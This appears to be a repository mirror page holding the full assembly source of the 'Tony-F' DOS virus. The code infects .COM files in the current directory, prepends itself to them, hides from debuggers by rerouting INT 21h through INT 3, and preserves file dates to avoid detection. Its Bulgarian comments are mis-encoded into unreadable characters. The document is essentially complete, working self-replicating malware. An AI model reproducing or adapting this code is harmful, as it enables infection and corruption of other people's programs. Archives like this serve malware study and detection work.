mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
4b9382ddbc
push
201 lines
7.4 KiB
NASM
201 lines
7.4 KiB
NASM
;------------------------------------------------------------------------------;
|
||
; ;
|
||
; ‚¨°³± Tony-F ;
|
||
; ;
|
||
; Tony_F ¥ ¯ ° §¨²¥ ¢¨°³±,¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤®²® - ¯°¨ ±² °²¨° ¥;
|
||
; § ° §¥ ´ ©« ¢¨°³±º² ¯°¥²º°±¢ ¶¿« ² ²¥ª³¹ ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢ ¢±¨·ª¨ ;
|
||
; ´ ©«®¢¥ ®²£®¢ °¿¹¨ ?*.COM, ª ²® ? § ¢¨±¨ ®² ¤ ² ² . ;
|
||
; Tony-F ±¥ ±² ¿¢ ¯°¥¤¨ ª®¤ § ° §¥¨¿ ´ ©«, ¢¨°³±º² ®°£ ¨§¨° ;
|
||
; ±®¡±²¢¥ ¯°®¶¥¤³° § ®¡° ¡®²ª ª°¨²¨·¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ¥ ¯°®¬¥¿;
|
||
; ¤ ² ² ¨ · ± § °¿§ ¨²¥ ´ ©«®¢¥. ;
|
||
; Tony-F ¬¨° ®°¨£¨ «¨¿ ¤°¥± ¢¥ª²®° 21h ¨ £® ¯®±² ¢¿ ¢ ² ¡«¨¶ ² ;
|
||
; ¯°¥ªº±¢ ¨¿² ª ²® ¢¥ª²®° 3, ² §¨ ®¯¥° ¶¨¿ ¯°¥·¨ ¥¢¥²³ «® ²° ±¨° ¥ ;
|
||
; ¢¨°³± ± ¤¥¡³£¥°. ;
|
||
;------------------------------------------------------------------------------;
|
||
|
||
; ±¥¬¡«¨° ©²¥ ± Turbo Assembler 2.0+
|
||
|
||
.model Tiny
|
||
.code
|
||
|
||
|
||
VirLen = offset EndCode - offset Start ; „º«¦¨ ¢¨°³± .
|
||
|
||
;-----------------------------------------------------------------------------;
|
||
|
||
Org 07Fh
|
||
|
||
INT24 db ? ; ’³ª ¹¥ ¡º¤¥ ±®·¥ ¢¥ª²®° 24h.
|
||
|
||
|
||
Org 0100h
|
||
|
||
NewDTA db 15h dup (?) ; ‘²°³ª²³° DTA.
|
||
FAttr db ?
|
||
FTime dw ?
|
||
FDate dw ?
|
||
FLen dw ?, ?
|
||
FName db 0Dh dup (?)
|
||
|
||
;-----------------------------------------------------------------------------;
|
||
|
||
Org 100h
|
||
|
||
Start:
|
||
push ax ; ‡ ¯ §¢ ±º¤º°¦ ¨¥²® AX.
|
||
|
||
;...... ’³ª § ¯®·¢ ²º°±¥¥²® ®°¨£¨ «¨¿ ¢¥ª²®° 21h ¢ ±¥£¬¥² „Ž‘
|
||
|
||
mov ax,1203h
|
||
int 2Fh ; <20>°®·¨² ±¥ ±¥£¬¥² „Ž‘.
|
||
|
||
xor si,si ; Ž°¨£¨ «¨¿ ¢¥ª²®° ±¥ ²º°±¨ ¯® ¯º°¢¨²¥
|
||
Again: ; ²°¨ ¡ ©² - 2…h,3€h ¨ 26h.
|
||
lodsw
|
||
cmp ax,3A2Eh
|
||
je NextByte
|
||
dec si
|
||
jnz Again
|
||
jmp Done
|
||
NextByte:
|
||
lodsb
|
||
cmp al,26h
|
||
jne Again
|
||
Found:
|
||
sub si,03
|
||
|
||
mov dx,si
|
||
mov ax,2503H ; ¢¥ª²®° 21h ±¥ ¯®±² ¢¿ ¬¿±²®²®
|
||
Int 21h ; ¢¥ª²®° 3.
|
||
|
||
push cs ; ¢º§±² ®¢¿¢ ±¥ ±²®©®±²² DS.
|
||
pop ds
|
||
|
||
;...... <20>°¥ ±®·¢ ¥ ¢¥ª²®° § ª°¨²¨·¨ £°¥¸ª¨
|
||
|
||
mov INT24,0CFh ; ‘º§¤ ¢ ®¢ ¢¥ª²®° 24h - Iret
|
||
mov ax,2524h
|
||
mov dx,offset INT24
|
||
Int 3 ; <20>°¥ ±®·¢ ¢¥ª²®° 24h.
|
||
|
||
|
||
mov ax,cs
|
||
add ah,10h
|
||
mov es,ax ; ES = CS + 64 KBytes
|
||
mov si,offset Start
|
||
xor di,di
|
||
mov cx,si ; <20>°¥µ¢º°«¿ ª®¤ ¢¨°³± 64KBytes
|
||
rep movsb ; ¯®- £®°¥ ¢ ¯ ¬¥²² .
|
||
|
||
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ®¢ ¤°¥±.
|
||
mov ah,1Ah
|
||
Int 3
|
||
|
||
mov ah,2Ah
|
||
Int 3 ; ˆ±ª ®² „Ž‘ ¤ ² ² ,
|
||
add dl,'A' ; ¨ ®² ¥¿ ±¥ ¯®«³· ¢ ¯º°¢ ² ¡³ª¢
|
||
mov AllCom ,dl ; ´ ©«®¢¥²¥ § § ° §¿¢ ¥.
|
||
|
||
;...... ‡ ¯®·¢ ²º°±¥¥ ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||
|
||
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '?*.COM' ´ ©«®¢¥.
|
||
mov cl,110B
|
||
mov ah,4Eh ; ˆ§¢¨ª¢ Find First.
|
||
Int 3
|
||
jc Done ; <20>°®¤º«¦ ¢ ² ²ºª ¯°¨ «¨¯±
|
||
; ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||
FindNext:
|
||
mov dx,offset Fname ; ‚ dx ¤°¥± ¨¬¥²® ´ ©« ®² DTA.
|
||
mov ax,3D02h ; Ž²¢ °¿ ´ ©« § § ¯¨±/·¥²¥¥.
|
||
Int 3
|
||
|
||
mov bx,ax ; ‡ ¯ §¢ ®¬¥° ®²¢®°¥¨¿ ´ ©«.
|
||
push ds ; ‡ ¯ §¢ DS.
|
||
push es
|
||
pop ds ; DS = CS + 64 KBytes.
|
||
|
||
mov dx,VirLen ; DX = ¤º«¦¨ ² ¢¨°³± .
|
||
mov cx,-1 ; <20>°®·¨² ±¥ ¶¥«¨¿ ´ ©« ¤°¥± - DS:DX .
|
||
mov ah,3Fh ; ’ ¬ ±¥ ¬¨° ¢¨°³± , ±¥£ ±«¥¤ ¥£®
|
||
Int 3 ; ¨ ´ ©«º².
|
||
|
||
; “¢¥«¨· ¢ ¤º«¦¨ ² ´ ©« (AX) ±
|
||
add ax,Virlen ; ¤º«¦¨ ² ¢¨°³± .
|
||
jc Close ; <20>°¨ ¯°¥¯º«¢ ¥ ´ ©«º² ¥ ±¥ § ° §¿¢ .
|
||
|
||
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; „ «¨ ´ ©«º² ¥ § ° §¥ ¢¥·¥ ?
|
||
je Close
|
||
|
||
push ax ; ‡ ¯ §¢ ¤º«¦¨ ² ´ ©« ¢ ±²¥ª .
|
||
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4200h ; <20>°¥¬¥±²¢ ±¥ ³ª § ²¥«¿ ´ ©« (CX:DX)
|
||
Int 3 ; ¢ · «®²® ¬³.
|
||
|
||
pop cx ; <20>°®·¨² ¤º«¦¨ ² ´ ©« ®² ±²¥ª .
|
||
; DX ¥ ° ¢® 0 ®² Fn 42.
|
||
mov ah,40h ; Ž² ¤°¥± DS:DX ±¥ § ¯¨±¢ ¤¨±ª
|
||
Int 3 ; ¢¨°³± + ´ ©«.
|
||
|
||
mov cx,cs:FTime
|
||
mov dx,cs:FDate ; ‚º§±² ®¢¿¢ ² ±¥ ¤ ² ² ¨ ¢°¥¬¥²®
|
||
mov ax,5701h ; § ° §¿¢ ¨¿ ´ ©« ®² DTA.
|
||
Int 3
|
||
|
||
Close:
|
||
pop ds ; ‚º§±² ®¢¿¢ DS.
|
||
|
||
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
|
||
Int 3
|
||
|
||
mov ah,4Fh
|
||
Int 3 ; ˆ§¢¨ª¢ Find Next,
|
||
jnc FindNext ; ª® ¨¬ ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
|
||
; ¨ § ²¿µ.
|
||
|
||
|
||
;....... <20> · «® ±² °²¨° ¥ ¯°®£° ¬ ² ªº¬ ª®¿²® ¥ § ª ·¥ ¢¨°³± .
|
||
|
||
Done:
|
||
mov dx,80h
|
||
mov ah,1Ah
|
||
Int 3 ; ‚º§±² ®¢¿¢ ±¥ ±² °¨¿ ¤°¥± DTA.
|
||
|
||
|
||
push es
|
||
mov ax,offset TransF -100h ; <20>°¥¤ ¢ ³¯° ¢«¥¨¥²® ¢¨°³±
|
||
push ax ; ª®©²® ¥ 64 KBytes ¯®- £®°¥
|
||
RETF ; ®² ¥²¨ª¥² TransF.
|
||
|
||
;........................................
|
||
; Œ °ª¨°®¢ª § ° §¯®§ ¢ ¥ § ° §¥¨
|
||
Mark db 'Tony' ; ´ ©«®¢¥.
|
||
AllCom db '+' ;
|
||
db '*.COM',0 ; Œ ±ª § ²º°±¥¥ ¢±¨·ª¨ ´ ©«®¢¥
|
||
;.......................................; § § ° §¿¢ ¥.
|
||
|
||
TRansF:
|
||
push ds
|
||
pop es
|
||
|
||
pop ax ; ‚º§±² ®¢¿¢ ±º¤º°¦ ¨¥²® AX.
|
||
|
||
mov si,offset EndCode ; ‘¬ºª¢ ª®¤ ¯°®£° ¬ ² § ¯®·¢ ¹
|
||
mov di,offset Start ; ¥¯®±°¥¤±²¢¥® ±«¥¤ ¢¨°³± ± 100h ¡ ©² ¤®«³.
|
||
push ds ; <20>®¤£®²¢¿ ¤°¥± ¢ ±²¥ª § ¯°¥µ®¤
|
||
push di ; ªº¬ · «®²® ®°¨£¨ « ² ¯°®£° ¬ .
|
||
mov cx,0FFF0h -102h -Virlen
|
||
rep movsb
|
||
|
||
RETF
|
||
|
||
;-----------------------------------------------------------------------------;
|
||
|
||
EndCode:
|
||
Ret ; Ž² ²³ª § ¯®·¢ § ° §¥ ² ¯°®£° ¬
|
||
|
||
;-----------------------------------------------------------------------------;
|
||
|
||
End Start
|
||
|